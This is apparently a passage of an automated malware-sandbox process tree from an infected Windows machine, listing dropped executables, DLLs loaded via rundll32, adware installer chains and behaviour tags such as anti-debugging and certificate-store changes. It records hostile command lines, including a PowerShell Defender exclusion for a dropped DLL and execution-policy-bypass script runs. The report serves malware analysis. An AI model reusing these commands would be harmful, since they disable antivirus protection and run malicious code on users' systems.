                                                                                                                                                              "C:\Users\Admin\Documents\skEshonksQssAPZ4aQDnxj8z.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:5368
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7101954.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7101954.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:1184
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6639991.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6639991.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                    PID:7892
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3490619.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3490619.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:4716
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\7172064.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\7172064.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:6300
                                                                                                                                                                    • C:\Users\Admin\Documents\K64ZSzPNUycwvwVfvI6PBrPU.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\K64ZSzPNUycwvwVfvI6PBrPU.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      PID:6232
                                                                                                                                                                    • C:\Users\Admin\Documents\O3B87Ze2x2JQo16PpXXwFHPa.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\O3B87Ze2x2JQo16PpXXwFHPa.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      PID:4168
                                                                                                                                                                    • C:\Users\Admin\Documents\w2014i9N7de0UkqbyyQSHEna.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\w2014i9N7de0UkqbyyQSHEna.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:4012
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 664
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6824
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 672
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6276
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 680
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6148
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 656
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5640
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 1144
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:7664
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 1180
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:7940
                                                                                                                                                                      • C:\Users\Admin\Documents\Gz9aCeM0Io7_meVXaAimnu1U.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\Gz9aCeM0Io7_meVXaAimnu1U.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:4512
                                                                                                                                                                          • C:\Users\Admin\Documents\Gz9aCeM0Io7_meVXaAimnu1U.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\Gz9aCeM0Io7_meVXaAimnu1U.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:8748
                                                                                                                                                                          • C:\Users\Admin\Documents\NB2SN_9jXr_IHfij53YdFw6c.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\NB2SN_9jXr_IHfij53YdFw6c.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:6224
                                                                                                                                                                            • C:\Users\Admin\Documents\NB2SN_9jXr_IHfij53YdFw6c.exe
                                                                                                                                                                              C:\Users\Admin\Documents\NB2SN_9jXr_IHfij53YdFw6c.exe
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:4744
                                                                                                                                                                              • C:\Users\Admin\Documents\NB2SN_9jXr_IHfij53YdFw6c.exe
                                                                                                                                                                                C:\Users\Admin\Documents\NB2SN_9jXr_IHfij53YdFw6c.exe
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:1124
                                                                                                                                                                              • C:\Users\Admin\Documents\T6Iq0PIQPuSrMRybCMyzqGNY.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\T6Iq0PIQPuSrMRybCMyzqGNY.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6236
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 668
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:5024
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 652
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:3360
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 680
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:4552
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 664
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:3004
                                                                                                                                                                                • C:\Users\Admin\Documents\u53a6THqKPGDReIzV5G08Qcy.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\u53a6THqKPGDReIzV5G08Qcy.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                  PID:2732
                                                                                                                                                                                • C:\Users\Admin\Documents\LxF_Vdfpki6LcGD7nA0ZhBMi.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\LxF_Vdfpki6LcGD7nA0ZhBMi.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:5464
                                                                                                                                                                                  • C:\Users\Admin\Documents\J3KjaFWoK9D8bDu2h1QSF_hm.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\J3KjaFWoK9D8bDu2h1QSF_hm.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:6872
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-A7JKD.tmp\J3KjaFWoK9D8bDu2h1QSF_hm.tmp
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-A7JKD.tmp\J3KjaFWoK9D8bDu2h1QSF_hm.tmp" /SL5="$10564,138429,56832,C:\Users\Admin\Documents\J3KjaFWoK9D8bDu2h1QSF_hm.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                        PID:5760
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-IAHEU.tmp\Setup.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-IAHEU.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:7840
                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                              9⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                              PID:4972
                                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629372052 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:7724
                                                                                                                                                                                        • C:\Users\Admin\Documents\nOXGgjfylyOCk8tU0OANRGbM.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\nOXGgjfylyOCk8tU0OANRGbM.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:6152
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\NOXGGJ~1.DLL,s C:\Users\Admin\DOCUME~1\NOXGGJ~1.EXE
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:5116
                                                                                                                                                                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\NOXGGJ~1.DLL,k1NA
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:688
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\NOXGGJ~1.DLL
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:5188
                                                                                                                                                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\NOXGGJ~1.DLL,JQAkbUVxTg==
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:408
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                          C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:9072
                                                                                                                                                                                                            • C:\Windows\system32\ctfmon.exe
                                                                                                                                                                                                              ctfmon.exe
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                PID:7796
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpC224.tmp.ps1"
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                            PID:8840
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpC794.tmp.ps1"
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:6488
                                                                                                                                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:664
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:9912
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:4808
                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:6108
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4651774.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4651774.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:3984
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5071110.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5071110.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                              PID:2212
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\8612776.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\8612776.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                              PID:3096
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\8333845.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\8333845.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:820
                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                PID:928
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\8752555.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\8752555.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:792
                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:1060
                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      PID:5788
                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                    PID:5584
                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:5608
                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                    PID:4100
                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      PID:7188
                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    PID:7316
                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 874D5F24B73BAC6A51F5CB14F97912C0 C
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      PID:6696
                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding A1B01B3F8C54904AD212C78DEB6243F5 C
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      PID:5996
                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 120AE5381CC9F3E49AF99858C341D7AF C
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      PID:8732
                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 8E90109FA7D2141FCF576C17EC6ABA4E
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      PID:9044
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2116
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:8316
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:7096
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ff828b7dec0,0x7ff828b7ded0,0x7ff828b7dee0
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:5828
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x154,0x158,0x15c,0x130,0x160,0x7ff6f0399e70,0x7ff6f0399e80,0x7ff6f0399e90
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:1468
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --mojo-platform-channel-handle=1704 /prefetch:8
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:7084
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --mojo-platform-channel-handle=2152 /prefetch:8
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:9196
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1656 /prefetch:2
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:6836
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=1872 /prefetch:1
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:7220
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:1
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                              PID:6840
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --mojo-platform-channel-handle=3200 /prefetch:8
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:9496
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3180 /prefetch:2
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:9556
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --mojo-platform-channel-handle=3568 /prefetch:8
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                  PID:8468
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --mojo-platform-channel-handle=2720 /prefetch:8
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:9472
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,5915353891476727928,14287608980542002301,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7096_1667343641" --mojo-platform-channel-handle=3532 /prefetch:8
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:9964
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
